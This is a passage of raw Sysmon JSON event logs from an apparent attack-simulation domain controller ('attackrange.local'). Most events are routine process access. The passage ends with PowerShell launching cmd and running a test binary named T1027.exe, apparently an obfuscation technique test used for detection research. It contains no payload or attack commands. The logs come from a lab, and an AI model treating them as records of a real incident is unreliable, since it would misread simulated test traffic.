"EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44883363)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010DB480A00}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44883363)","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.422\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010DB480A00}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.422","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010DB480A00}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.440\r\nProcessGuid: {A837DB8D-032D-5F25-0000-0010A2490A00}\r\nProcessId: 3288\r\nImage: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\"  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: 